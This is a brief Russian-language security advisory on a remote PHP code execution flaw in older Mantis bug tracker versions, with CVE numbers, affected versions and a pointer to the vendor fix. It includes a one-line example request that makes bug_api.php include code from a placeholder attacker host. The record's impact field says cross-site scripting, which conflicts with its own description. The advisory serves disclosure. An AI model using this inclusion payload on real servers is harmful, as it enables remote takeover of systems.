Удаленное выполнение произвольного PHP кода в Mantis

Дата публикации:23.08.2004
Дата изменения:17.10.2006
Всего просмотров:855
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2004-1730
CVE-2004-1731
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: MantisBT 0.x
Уязвимые версии: Mantis 0.19.0a2 и более ранние версии

Описание: Уязвимость в Mantis позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе.

Пример:
http://[target]/mantis/core/bug_api.php?t_core_dir= http://[attacker]/)

URL производителя:http://www.mantisbt.org

Решение:Испавление доступно через CVS: http://www.mantisbt.org/cvs.php

Ссылки: Mantis Bugtracker Remote PHP Code Execution Vulnerability